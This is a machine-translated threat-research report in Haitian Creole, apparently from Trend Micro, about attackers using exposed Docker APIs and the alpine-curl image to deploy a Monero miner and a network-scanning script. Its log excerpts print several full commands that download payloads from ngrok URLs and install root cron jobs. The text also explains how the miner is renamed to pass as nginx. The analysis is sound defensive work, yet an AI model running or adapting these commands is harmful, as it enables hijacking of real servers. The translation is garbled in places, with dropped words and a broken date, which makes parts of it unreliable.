Nou analize done yo kolekte lè l sèvi avèk resipyan honeypot, ke nou te kreye pou swiv menas yo. Epi nou te detekte aktivite enpòtan nan minè kriptografik ki pa vle oswa ki pa otorize deplwaye kòm resipyan vakabon lè l sèvi avèk yon imaj kominote a pibliye sou Docker Hub. Se imaj la itilize kòm yon pati nan yon sèvis ki delivre minè cryptocurrency move.
Anplis de sa, pwogram pou travay ak rezo yo enstale pou antre nan resipyan ak aplikasyon vwazen yo.
Nou kite honeypots nou yo jan yo ye, se sa ki, ak anviwònman default, san okenn mezi sekirite oswa enstalasyon ki vin apre lòt lojisyèl. Tanpri sonje ke Docker gen rekòmandasyon pou premye konfigirasyon pou evite erè ak frajilite senp. Men, siwo myèl yo itilize yo se resipyan, ki fèt pou detekte atak ki vize a platfòm containerization, pa aplikasyon yo andedan resipyan yo.
Aktivite move detekte a remakab tou paske li pa mande pou frajilite epi li endepandan tou de vèsyon Docker la. Jwenn yon imaj veso ki mal configuré, ak Se poutèt sa louvri, se tout sa ki atakè yo bezwen enfekte anpil sèvè louvri.
API Docker ki pa fèmen pèmèt itilizatè a fè yon pakèt domèn , ki gen ladan jwenn yon lis kontenè k ap kouri, jwenn mòso bwa nan yon veso espesifik, kòmanse, kanpe (tankou fòse) e menm kreye yon nouvo veso ki soti nan yon imaj espesifik ak anviwònman espesifye.
Sou bò gòch la se metòd livrezon malveyan. Sou bò dwat la se anviwònman atakè a, ki pèmèt pou aleka woule soti nan imaj.
Distribisyon pa peyi nan 3762 API Docker louvri. Baze sou rechèch Shodan ki gen dat 12.02.2019/XNUMX/XNUMX
Chèn atak ak opsyon chaj
Aktivite move te detekte pa sèlman avèk èd nan honeypots. Done ki soti nan Shodan montre ke kantite ekspoze Docker APIs (gade dezyèm graf) te ogmante depi nou te envestige yon veso ki mal konfigirasyon itilize kòm yon pon pou deplwaye lojisyèl min kriptografik Monero. Nan mwa Oktòb ane pase a (2018, done aktyèl yo approx. tradiktè) te gen sèlman 856 API louvri.
Yon egzamen nan mòso bwa yo te montre ke itilizasyon imaj veso yo te asosye tou ak itilizasyon an , yon zouti pou etabli koneksyon an sekirite oswa voye trafik soti nan pwen aksesib piblikman nan adrès espesifik oswa resous (pa egzanp localhost). Sa a pèmèt atakè yo dinamik kreye URL lè yo ap fè livrezon chaj nan yon sèvè louvri. Anba a se egzanp kòd ki soti nan mòso bwa yo ki montre abi sèvis ngrok la:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Kòm ou ka wè, dosye yo telechaje yo telechaje soti nan URL ki toujou ap chanje. URL sa yo gen yon dat ekspirasyon kout, kidonk chaj yo pa ka telechaje apre dat ekspirasyon an.
Gen de opsyon chaj. Premye a se yon minè ELF konpile pou Linux (defini kòm Coinminer.SH.MALXMR.ATNO) ki konekte ak pisin nan min. Dezyèm lan se yon script (TrojanSpy.SH.ZNETMAP.A) ki fèt pou jwenn sèten zouti rezo yo itilize pou eskane chenn rezo yo epi chèche nouvo objektif.
Script gout la mete de varyab, ki Lè sa a, yo itilize yo deplwaye minè a cryptocurrency. Varyab HOST la gen adrès entènèt kote fichye move yo ye, ak varyab RIP la se non fichye (an reyalite, hash la) minè a pou deplwaye. Varyab HOST la chanje chak fwa varyab hash la chanje. Script la tou ap eseye tcheke ke pa gen okenn lòt minè cryptocurrency ap kouri sou sèvè a atake.
Egzanp varyab HOST ak RIP, ansanm ak yon ti kòd ki itilize pou tcheke si pa gen lòt minè k ap kouri.
Anvan yo kòmanse minè a, li chanje non an nginx. Lòt vèsyon script sa a chanje non minè a bay lòt sèvis lejitim ki ka prezan nan anviwònman Linux. Sa a se anjeneral ase kontoune chèk kont lis la nan pwosesis kouri.
Script rechèch la gen karakteristik tou. Li travay ak sèvis URL la menm deplwaye zouti ki nesesè yo. Pami yo se binè zmap, ki itilize pou eskane rezo yo epi jwenn yon lis pò louvri. Script la tou chaje yon lòt binè ki itilize pou kominike avèk sèvis yo jwenn epi resevwa banyè nan men yo pou detèmine enfòmasyon adisyonèl sou sèvis yo jwenn (pa egzanp, vèsyon li yo).
Script la tou pre-detèmine kèk chenn rezo pou eskane, men sa depann de vèsyon an nan script la. Li tou etabli pò yo sib nan sèvis yo-nan ka sa a, Docker-anvan kouri eskanè a.
Le pli vit ke posib objektif yo jwenn, bandwòl yo otomatikman retire nan yo. Script la filtre tou sib selon sèvis, aplikasyon, konpozan oswa platfòm ki enterese yo: Redis, Jenkins, Drupal, MODX, , Docker 1.16 kliyan ak Apache CouchDB. Si sèvè a tcheke matche ak nenpòt nan yo, li se sove nan yon dosye tèks, ki atakè yo ka pita itilize pou analiz ki vin apre ak pirataj. Fichye tèks sa yo telechaje sou sèvè atakè yo atravè lyen dinamik. Sa vle di, yo itilize yon URL separe pou chak fichye, ki vle di aksè ki vin apre yo difisil.
Vektè atak la se yon imaj Docker, jan yo ka wè nan de pwochen moso kòd yo.
Nan tèt la se chanje non yon sèvis lejitim, ak nan pati anba a se ki jan zmap yo itilize pou eskane rezo yo.
Nan tèt yo se seri rezo predefini, nan pati anba a se pò espesifik pou chèche sèvis, ki gen ladan Docker.
Ekran an montre ke imaj alpine-curl la te telechaje plis pase 10 milyon fwa
Ki baze sou Alpine Linux ak curl, yon zouti CLI resous efikas pou transfere dosye sou divès pwotokòl, ou ka bati. . Kòm ou ka wè nan imaj anvan an, imaj sa a te deja telechaje plis pase 10 milyon fwa. Yon gwo kantite telechajman ka vle di itilize imaj sa a kòm yon pwen antre; imaj sa a te mete ajou plis pase sis mwa de sa; itilizatè yo pa t 'telechaje lòt imaj ki soti nan depo sa a souvan. Nan Docker - yon seri enstriksyon yo itilize pou konfigirasyon yon veso pou kouri li. Si paramèt pwen antre yo pa kòrèk (pa egzanp, veso a rete louvri nan Entènèt), imaj la ka itilize kòm vektè atak. Atakè yo ka sèvi ak li pou delivre yon chaj si yo jwenn yon veso ki mal konfiguré oswa ki louvri ki pa sipòte.
Li enpòtan sonje ke imaj sa a (alpine-curl) tèt li pa move, men jan ou ka wè pi wo a, li ka itilize pou fè fonksyon move. Imaj Docker menm jan an ka itilize tou pou fè aktivite move. Nou kontakte Docker e nou te travay avèk yo sou pwoblèm sa a.
Rekòmandasyon
rete pou anpil konpayi, sitou sa k ap aplike , konsantre sou devlopman rapid ak livrezon. Tout bagay agrave pa bezwen konfòme yo ak règleman odit ak siveyans, bezwen kontwole konfidansyalite done yo, osi byen ke gwo domaj ki soti nan non-konfòmite yo. Enkòpore automatisation sekirite nan sik lavi devlopman an non sèlman ede w jwenn twou sekirite ki otreman ta ka pa detekte, men li ede w tou redwi kantite travay ki pa nesesè, tankou kouri lojisyèl adisyonèl pou chak vilnerabilite dekouvri oswa move konfigirasyon apre yo fin deplwaye yon aplikasyon.
Ensidan an diskite nan atik sa a mete aksan sou bezwen pou pran sekirite an kont depi nan kòmansman an, ki gen ladan rekòmandasyon sa yo:
- Pou administratè ak devlopè sistèm yo: Toujou tcheke paramèt API ou yo pou asire tout bagay konfigirasyon pou sèlman aksepte demann ki soti nan yon sèvè espesifik oswa rezo entèn.
- Swiv prensip pi piti dwa: asire ke imaj veso yo siyen ak verifye, limite aksè a eleman kritik (sèvis lansman veso) epi ajoute chifreman nan koneksyon rezo yo.
- Swiv epi pèmèt mekanis sekirite, pa egzanp. ak bati-an .
- Sèvi ak analiz otomatik nan ekzekite ak imaj pou jwenn plis enfòmasyon sou pwosesis yo ap kouri nan veso a (pa egzanp, pou detekte spoofing oswa chèche vilnerabilite). Kontwòl aplikasyon ak siveyans entegrite ede swiv chanjman nòmal nan sèvè, fichye, ak zòn sistèm yo.
Trendmicro ede ekip DevOps yo konstwi an sekirite, dewoule byen vit, epi lanse nenpòt kote. Tandans Micro Bay sekirite pwisan, rasyonalize, ak otomatik atravè tiyo DevOps yon òganizasyon epi li bay plizyè defans menas. pou pwoteje chay travay fizik, vityèl ak nwaj nan tan exécution. Li tou ajoute sekirite veso ak и , ki analize imaj veso Docker pou malveyan ak frajilite nan nenpòt ki pwen nan tiyo devlopman an pou anpeche menas yo anvan yo deplwaye.
Siy konpwomi
Hash ki gen rapò:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Sou Pratike moun ki pale yo montre ki paramèt yo dwe fèt an premye pou yo ka minimize pwobabilite a oswa pou evite konplètman sitiyasyon ki dekri pi wo a rive. Ak sou Out 19-21 nan yon entansif sou entènèt Ou ka diskite sou pwoblèm sa yo ak pwoblèm sekirite menm jan an ak kòlèg li yo ak pwofesè pratikan nan yon tab wonn, kote tout moun ka pale ak koute doulè yo ak siksè nan kòlèg ki gen eksperyans.
Sous: www.habr.com